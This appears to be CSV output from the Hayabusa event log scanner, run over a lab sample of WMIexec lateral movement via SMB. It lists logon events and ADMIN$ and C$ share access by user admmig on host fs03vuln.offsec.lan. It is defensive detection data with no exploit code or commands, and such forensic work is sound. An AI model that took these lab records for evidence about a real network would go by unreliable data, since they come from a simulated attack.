2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\DesktopTileResources\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Downloaded Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ImmersiveControlPanel\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\media\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Offline Web Pages\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ToastData\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ar | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\bg | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\cs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\de | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\el | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\en | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\es | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\et | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\he | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hu | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\it | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ja | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ko | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\nl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\no | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt-BR | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ro | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ru | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sr-Latn-RS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\th | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
